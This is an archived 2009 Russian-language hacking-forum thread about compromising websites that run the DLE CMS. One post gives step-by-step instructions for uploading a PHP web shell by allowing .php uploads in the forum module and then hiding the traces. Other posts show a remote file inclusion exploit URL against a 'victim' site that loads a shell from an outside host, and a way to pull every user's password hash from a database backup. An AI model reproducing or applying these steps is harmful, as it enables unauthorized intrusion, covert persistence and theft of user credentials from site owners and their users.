ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

25.09.2009, 17:58
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме: 362547
Репутация:
93
|
|
можно ли через пользователя залить шелл?
имеется доступ /admin.php?mod=addnews&action=addnews
|
|
|

08.10.2009, 20:35
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме: 64705
Репутация:
6
|
|
hackmon, нельзя.
В последних версиях, по-моему, вообще нереально, имея даже полный доступ в админку.
|
|
|

09.10.2009, 16:00
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Если имеется установленный модуль DLE forum - то шелл залить проще простого, имея доступ в админку.
Заходим в админку - другие разделы - настройка модуля DLE forum (/admin.php?mod=options&action=options)
Настройка (/admin.php?mod=forum&action=tools) - таб "настройка загрузки файлов на сервер".
В "Расширение файлов, допустимых к загрузке" дописываем ",php", сохраняем.
Идем на форум, выбираем любую тему, нажимаем "ответить", в нвоом окне нажимает на значок папки (выше поля ввода сообщения).
Там выбираем наш шелл в .PHP формате (.php обрезается самим движком). Грузим, вставляем в пост (аттачмент), постим. Видим в посте линк. переходим - вот и наш шелл.
после этого можно залить наш шелл в другое место, удалить этот и стереть пост.
Ну и, главное, не забыть в админке в настройках убрать добавленное разрешени PHP
(с)WildShaman 2009
|
|
|

11.10.2009, 04:39
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме: 64705
Репутация:
6
|
|
wildshaman,
только что попробовал, не получилось. Скорее всего из-за ЧПУ. По-моему, оно должно быть отключено.
|
|
|

11.10.2009, 11:40
|
|
Новичок
Регистрация: 07.10.2009
Сообщений: 8
Провел на форуме: 150434
Репутация:
7
|
|
Люди подскажите как можно вытащить хеши паролей всех пользователей без доступа к бд?
|
|
|

12.10.2009, 09:16
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 17
Провел на форуме: 64705
Репутация:
6
|
|
Сообщение от denniselite
Люди подскажите как можно вытащить хеши паролей всех пользователей без доступа к бд?
Если есть доступ в админку, то сделать бэкап базы, скачать его, и вытащить оттуда.
|
|
|

16.10.2009, 19:51
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме: 362547
Репутация:
93
|
|
у мня проблема вот линк http://www.milw0rm.com/exploits/9572
там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия)
эта строчко остается неизменная /engine/api/api.class.php?dle_config_api=
и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом
пс убирал расширение ничего
кто потскажет
|
|
|

16.10.2009, 20:08
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt?
так делал? с вопросом в конце.
|
|
|

16.10.2009, 20:18
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме: 362547
Репутация:
93
|
|
Сообщение от wildshaman
http://site-na-dle.ru/engine/api/api.class.php?dle_config_api=http://site.narod.ru/.txt?
так делал? с вопросом в конце.
все равно
|
|
|

16.10.2009, 21:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме: 2375131
Репутация:
1695
|
|
Сообщение от hackmon
у мня проблема вот линк http://www.milw0rm.com/exploits/9572
там эксплоит www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
вместо сайт я вставляю сайт жертвы (и знаю что там установлена такая же версия)
эта строчко остается неизменная /engine/api/api.class.php?dle_config_api=
и шелл Я загрузил на site narod.ru тоесть после config_api= я ввожу линк на свой сайт с шеллом
пс убирал расширение ничего
кто потскажет
Может register_globals = Off
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|